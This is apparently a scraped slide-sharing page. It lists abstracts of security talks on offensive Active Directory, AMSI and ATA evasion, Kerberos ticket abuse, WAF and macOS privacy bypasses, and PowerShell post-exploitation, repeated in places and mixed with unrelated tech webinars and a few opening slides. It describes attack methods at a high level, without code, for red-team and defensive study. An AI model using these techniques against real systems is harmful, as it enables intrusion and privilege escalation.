PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
This talk covers PowerShell for offensive Active Directory operations with PowerView. It was given on April 21, 2016 at the PowerShell Conference EU 2016.
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
The talk I gave at Black Hat USA 2016 on Anti Malware Scan Interface. The talk looks at what good AMSI brings to Windows 10 and various methods of avoiding/bypassing it.
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
This talk covers PowerShell for offensive Active Directory operations with PowerView. It was given on April 21, 2016 at the PowerShell Conference EU 2016.
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
The talk I gave at Black Hat USA 2016 on Anti Malware Scan Interface. The talk looks at what good AMSI brings to Windows 10 and various methods of avoiding/bypassing it.
Identifying privilege escalation paths within an Active Directory environment is crucial for a successful red team. Over the last few years, BloodHound has made it easier for red teamers to perform reconnaissance activities and identify these attacks paths. When evaluating BloodHound data, it is common to find ourselves having sufficient rights to modify a Group Policy Object (GPO). This level of access allows us to perform a number of attacks, targeting any computer or user object controlled by the vulnerable GPO.
In this talk we will present previous research related to GPO abuses and share a number of misconfigurations we have found in the wild. We will also present a tool that allows red teamers to target users and computers controlled by a vulnerable GPO in order to escalate privileges and move laterally within the environment.
This presentation was given at BSides Austin '15, and is an expanded version of the "I hunt sys admins" Shmoocon firetalk. It covers various ways to hunt for users in Windows domains, including using PowerView.
Operational Security (OPSEC) is one of the most important aspects to consider in Adversary Simulations (usually called "Red Teaming"). When talking about OPSEC, it is common to think around matters like AV/EDR evasion, avoiding "noises" or using builtin/legitimate tools whenever is possible. In fact, the scope of the term OPSEC is usually wider than that.
OPSEC usually refers to the identification and protection of data that could be useful for an adversary. In Adversary Simulations, the adversary is the organisation's security team (Blue Team) and the goal is to improve their detection capabilities. This is why the maturity of an organisation should dictate the complexity required to carry out these operations, so that the objectives are met with the minimum effort, as it would do an attacker in real life.
For example, for experienced Blue Teams, the mere fact of using legitimate tools such as net.exe (e.g. “net users /domain”) or powershell.exe could be a reason for the whole operation to be discovered, whereas in other organisations or situations these same actions could remain completely unnoticed.
In this presentation we will discuss how you should review and understand your own toolset and procedures in order to gain OPSEC. We will comprehend how to deal with trade-offs, and why understanding your adversary is key in that matter. In addition, sources of detection (disk, memory, network...) and resources commonly employed by defenders (events, hooks, callbacks...) will be explained visually and practically to help you building and improving your operations.
Understanding and Hiding your Operations’ goal is to be a resource for comprehending the meaning of OPSEC and creating awareness in your operations, so as you can successfully face – and improve – experienced security teams and their detection capabilities.
This presentation was given at PSConfEU and covers common privilege escalation vectors for Windows systems, as well as how to enumerate these issues with PowerUp.
[errata] For more information on DCSync and associated permissions, as well as AdminSDHolder and associated permissions, see Sean Metcalf's respective posts at https://adsecurity.org/?p=1729 and https://adsecurity.org/?p=1906 .
"An ACE Up the Sleeve: Designing Active Directory DACL Backdoors" was presented at BlackHat and DEF CON 2017.
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
Presented by Andy Robbins, Rohan Vazarkar, and Will Schroeder at DerbyCon 7.0: Legacy, in Louisville, Kentucky, 2017.
See the video recording of the presentation here: https://www.youtube.com/watch?v=mfaFuXEiLF4
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
Talk of Skip Duckwall and I at BlackHat 2014 USA / Defcon Wall of Sheep.
Kerberos, and new pass-the-* feature, like overpass-the-hash and the Golden Ticket
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Effective security requires a layered approach. If one layer is comprised, the additional layers will (hopefully) stop an attacker from going further. Much of container security has focused on the image build process and providing providence for the artifacts in a container image, and restricting kernel level tunables in the container runtime (seccomp, SELinux, capabilities, etc). What if we can detect abnormal behavior in the application and the container runtime environment as well? In this talk, we’ll present Falco - an open source project for runtime security - and discuss how it provides application and container runtime security. We will show how Falco taps Linux system calls to provide low level insight into application behavior, and how to write Falco rules to detect abnormal behavior. Finally we will show how Falco can trigger notifications to stop abnormal behavior, notify humans, and isolate the compromised application for forensics. Attendees will leave with a better understanding of the container security landscape, what problems runtime security solves, & how Falco can provide runtime security and incident response.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
20+ ways to bypass your mac os privacy mechanismsCsaba Fitzl
"TotallyNotAVirus.app" would like to access the camera and spy on you. To protect your privacy, Apple introduced Transparency, Consent, and Control (TCC) framework that restricts access to sensitive personal resources: documents, camera, microphone, emails, and more. Granting such access requires authorization, and the mechanism's main design concern was clear user consent.
In this talk, we will share multiple techniques that allowed us to bypass this prompt, and as a malicious application, get access to protected resources without any additional privileges or user's consent. Together, we submitted over 40 vulnerabilities just to Apple through the past year, which allowed us to bypass some parts or the entire TCC. We also found numerous vulnerabilities in third-party apps (including Firefox, Signal, and others), which allowed us to avoid the OS restrictions by leveraging the targeted apps' privileges.
In the first part of the talk, we will give you an overview of the TCC framework, its building blocks, and how it limits application access to private data. We will explore the various databases it uses and discuss the difference between user consent and user intent.
Next, we will go through various techniques and specific vulnerabilities that we used to bypass TCC. We will cover how we can use techniques like process injection, mounting, application behavior, or simple file searches to find vulnerabilities and gain access to the protected resources.
The audience will leave with a solid understanding of the macOS privacy restrictions framework (TCC) and its weaknesses. We believe there is a need to raise awareness on why OS protections are not 100% effective, and in the end, users have to be careful with installing software on their machines. Moreover - as we're going to publish several exploits - red teams will also benefit from the talk.
No locked doors, no windows barred: hacking OpenAM infrastructureAndrew Petukhov
One of the main functional components of enterprise applications and Internet portals is an authentication and access control system (AuthC/Z). In this presentation, we describe a popular access control system called ForgeRock OpenAM from the external security point of view. We show the scenarios of full enterprise application compromise through complex attacks which employ both LFI and SSRF.
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamersjasonjfrank
This presentation, given at BSidesPittsburgh 2015, discusses free tools and techniques penetration testers use that can be translated to network defenders for immediate impact and value.
Identifying privilege escalation paths within an Active Directory environment is crucial for a successful red team. Over the last few years, BloodHound has made it easier for red teamers to perform reconnaissance activities and identify these attacks paths. When evaluating BloodHound data, it is common to find ourselves having sufficient rights to modify a Group Policy Object (GPO). This level of access allows us to perform a number of attacks, targeting any computer or user object controlled by the vulnerable GPO.
In this talk we will present previous research related to GPO abuses and share a number of misconfigurations we have found in the wild. We will also present a tool that allows red teamers to target users and computers controlled by a vulnerable GPO in order to escalate privileges and move laterally within the environment.
This presentation was given at BSides Austin '15, and is an expanded version of the "I hunt sys admins" Shmoocon firetalk. It covers various ways to hunt for users in Windows domains, including using PowerView.
Operational Security (OPSEC) is one of the most important aspects to consider in Adversary Simulations (usually called "Red Teaming"). When talking about OPSEC, it is common to think around matters like AV/EDR evasion, avoiding "noises" or using builtin/legitimate tools whenever is possible. In fact, the scope of the term OPSEC is usually wider than that.
OPSEC usually refers to the identification and protection of data that could be useful for an adversary. In Adversary Simulations, the adversary is the organisation's security team (Blue Team) and the goal is to improve their detection capabilities. This is why the maturity of an organisation should dictate the complexity required to carry out these operations, so that the objectives are met with the minimum effort, as it would do an attacker in real life.
For example, for experienced Blue Teams, the mere fact of using legitimate tools such as net.exe (e.g. “net users /domain”) or powershell.exe could be a reason for the whole operation to be discovered, whereas in other organisations or situations these same actions could remain completely unnoticed.
In this presentation we will discuss how you should review and understand your own toolset and procedures in order to gain OPSEC. We will comprehend how to deal with trade-offs, and why understanding your adversary is key in that matter. In addition, sources of detection (disk, memory, network...) and resources commonly employed by defenders (events, hooks, callbacks...) will be explained visually and practically to help you building and improving your operations.
Understanding and Hiding your Operations’ goal is to be a resource for comprehending the meaning of OPSEC and creating awareness in your operations, so as you can successfully face – and improve – experienced security teams and their detection capabilities.
This presentation was given at PSConfEU and covers common privilege escalation vectors for Windows systems, as well as how to enumerate these issues with PowerUp.
[errata] For more information on DCSync and associated permissions, as well as AdminSDHolder and associated permissions, see Sean Metcalf's respective posts at https://adsecurity.org/?p=1729 and https://adsecurity.org/?p=1906 .
"An ACE Up the Sleeve: Designing Active Directory DACL Backdoors" was presented at BlackHat and DEF CON 2017.
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
Presented by Andy Robbins, Rohan Vazarkar, and Will Schroeder at DerbyCon 7.0: Legacy, in Louisville, Kentucky, 2017.
See the video recording of the presentation here: https://www.youtube.com/watch?v=mfaFuXEiLF4
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
Talk of Skip Duckwall and I at BlackHat 2014 USA / Defcon Wall of Sheep.
Kerberos, and new pass-the-* feature, like overpass-the-hash and the Golden Ticket
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Effective security requires a layered approach. If one layer is comprised, the additional layers will (hopefully) stop an attacker from going further. Much of container security has focused on the image build process and providing providence for the artifacts in a container image, and restricting kernel level tunables in the container runtime (seccomp, SELinux, capabilities, etc). What if we can detect abnormal behavior in the application and the container runtime environment as well? In this talk, we’ll present Falco - an open source project for runtime security - and discuss how it provides application and container runtime security. We will show how Falco taps Linux system calls to provide low level insight into application behavior, and how to write Falco rules to detect abnormal behavior. Finally we will show how Falco can trigger notifications to stop abnormal behavior, notify humans, and isolate the compromised application for forensics. Attendees will leave with a better understanding of the container security landscape, what problems runtime security solves, & how Falco can provide runtime security and incident response.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
20+ ways to bypass your mac os privacy mechanismsCsaba Fitzl
"TotallyNotAVirus.app" would like to access the camera and spy on you. To protect your privacy, Apple introduced Transparency, Consent, and Control (TCC) framework that restricts access to sensitive personal resources: documents, camera, microphone, emails, and more. Granting such access requires authorization, and the mechanism's main design concern was clear user consent.
In this talk, we will share multiple techniques that allowed us to bypass this prompt, and as a malicious application, get access to protected resources without any additional privileges or user's consent. Together, we submitted over 40 vulnerabilities just to Apple through the past year, which allowed us to bypass some parts or the entire TCC. We also found numerous vulnerabilities in third-party apps (including Firefox, Signal, and others), which allowed us to avoid the OS restrictions by leveraging the targeted apps' privileges.
In the first part of the talk, we will give you an overview of the TCC framework, its building blocks, and how it limits application access to private data. We will explore the various databases it uses and discuss the difference between user consent and user intent.
Next, we will go through various techniques and specific vulnerabilities that we used to bypass TCC. We will cover how we can use techniques like process injection, mounting, application behavior, or simple file searches to find vulnerabilities and gain access to the protected resources.
The audience will leave with a solid understanding of the macOS privacy restrictions framework (TCC) and its weaknesses. We believe there is a need to raise awareness on why OS protections are not 100% effective, and in the end, users have to be careful with installing software on their machines. Moreover - as we're going to publish several exploits - red teams will also benefit from the talk.
No locked doors, no windows barred: hacking OpenAM infrastructureAndrew Petukhov
One of the main functional components of enterprise applications and Internet portals is an authentication and access control system (AuthC/Z). In this presentation, we describe a popular access control system called ForgeRock OpenAM from the external security point of view. We show the scenarios of full enterprise application compromise through complex attacks which employ both LFI and SSRF.
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamersjasonjfrank
This presentation, given at BSidesPittsburgh 2015, discusses free tools and techniques penetration testers use that can be translated to network defenders for immediate impact and value.
As organizations assess the security of their information systems, the need for automation has become more and more apparent. Not only are organizations attempting to automate their assessments, the need is becoming more pressing to perform assessments centrally against large numbers of enterprise systems. Penetration testers can use this automation to make their post-exploitation efforts more thorough, repeatable, and efficient. Defenders need to understand the techniques attackers are using once an initial compromise has occurred so they can build defenses to stop the attacks. Microsoft's PowerShell scripting language has become the defacto standard for many organizations looking to perform this level of distributed automation. In this presentation James Tarala, of Enclave Security, will describe to students the enterprise capabilities PowerShell offers and show practical examples of how PowerShell can be used to perform large scale penetration tests of Microsoft Windows systems.
Malicious PowerShell scripts are on the rise, as attackers are using the framework’s flexibility to download their payloads, traverse through a compromised network, and carry out reconnaissance. Symantec analyzed PowerShell malware samples to find out how much of a danger they posed.
Further reading:
PowerShell threats surge: 95.4 percent of analyzed scripts were malicious (https://www.symantec.com/connect/blogs/powershell-threats-surge-954-percent-analyzed-scripts-were-malicious)
The increased use of PowerShell in attacks (https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf)
One thing that most programmers do not take the time to understand is the servers that their application lives on. Most know a smattering of Apache configs, PHP configs, and basic information about the OS. This talk will deal with looking at tools that can help you quickly set up a server and how it can help you be a better developer. We'll look at tools like puppet for server management, OSSEC for log management, different command line tools, and nagios/monit for system monitoring.
The Dark Side of PowerShell by George DobreaEC-Council
PowerShell is now a ‘mandatory-to-use’ tool for IT professionals in order to automate administration of the Windows OS and applications, including Azure and Nano Server. Unfortunately, threat actors have recently taken advantage of this powerful scripting language just because PowerShell it’s already installed on your Windows machines, trusted by Admins and most AntiVirus tools! The session presents the steps that should get you starting on (Ethical) Hacking and Pen Testing with PowerShell and some new techniques like JEA (Just Enough Administration) that a defender can use in order to limit the effectiveness of PowerShell attacks.
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where you have deployed a malware on a user’s workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user’s workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic meaning that they work against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
Incorporating PowerShell into your Arsenal with PS>Attackjaredhaight
This talk serves as a follow up to my Introducing PS>Attack talk and covers some new features that have been added to the tool as well as how to defend an environment against PowerShell based attacks.
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where the hacker/penetration-tester has deployed a malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.) On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
Having been a Penetration Tester for the last 15+ years I have seen many environments and technologies. I have had the pleasure / hell of testing systems I’ve never even heard of and the agony of defeat on a major scale. Instead of just going over the what we used to work our way in, I want to go over the tricks the BLUE team used to keep us out! We will go over the technologies and techniques that have turned our traditional paths to root from minutes to months and the tricks that got us “caught” along the way. Not all pentests are a dream and the nightmares CAN / DO happen. So, let’s talk about how YOUR environment can become an attackers worst nightmare instead of their favorite playground
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
The talk I gave at Black Hat USA 2017 on bypassing Microsoft Advanced Threat Analytics (ATA). I demonstrate techniques to bypass, avoid and attack ATA in this talk.
Continuous intrusion: Why CI tools are an attacker’s best friendsNikhil Mittal
Slides of the talk I gave at BlackHat Europe and DeepSec 2015. Continuous Integration (CI) tools provide an excellent attack surface due to the no/poor security controls, distributed build management capability, and level of access/privileges in an enterprise.
This talk looks at the CI tools from an attacker's perspective and to use them as portals for getting a foothold and lateral movement. We will see how to execute attacks like command and script execution, credentials stealing, privilege escalation to not only compromise the build process but the underlying operating system and even entire Windows domains. No memory corruption bugs will be exploited and only the features of the CI tools will be used.
This presentation done at DeepSec 2014 focuses on using PowerShell for Client Side attacks. New scripts which are part of the open-source toolkit Nishang were also released. NIshang is toolkit in PowerShell for Penetration Testing
This was a workshop I conducted at Black Hat Europe'12. The workshop explains how to program a USB HID, Teensy++ in this case, for usage in offensive security.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
2. About Me
▪ Hacker, RedTeamer,Trainer, Speaker at
http://pentesteracademy.com/
▪ Twitter - @nikhil_mitt
▪ Blog – http://labofapenetrationtester.com
▪ Github - https://github.com/samratashok/
▪ Creator of Kautilya and Nishang
▪ Interested in Offensive Information Security, new attack vectors and
methodologies to pwn systems.
▪ PreviousTalks and/orTrainings
– DefCon, BlackHat, CanSecWest, BruCON, 44CON and more.
Hacked? Pray that the attacker used PowerShell 2IT Defense 2018
3. Agenda
▪ Motivation
▪ Attack simulation using PowerShell
▪ PowerShell ♥ the BlueTeam
▪ Detections using PowerShell v5.1
▪ Bypasses of the detections and detections for the bypasses
▪ Conclusion
Hacked? Pray that the attacker used PowerShell 3IT Defense 2018
4. Motivation
▪ PowerShell v2 comes installed by default inWindows 7.
▪ It allows ability to interact with Windows components like
Filesystem, Registry, Active Directory, COM,WMI,Windows API,
.NET on local as well as remote boxes and in-memory execution of
scripts as a built-in feature and extension of abilities by using .NET
classes without leaving any logs on the target system.
▪ Improvements inWindows PowerShellv5 has made it one of the most
logged scripting language across platforms.
▪ I have been using PowerShell for RedTeaming for past 7 years and
recently for PurpleTeaming and increasingly find it equally useful for
defense as well!
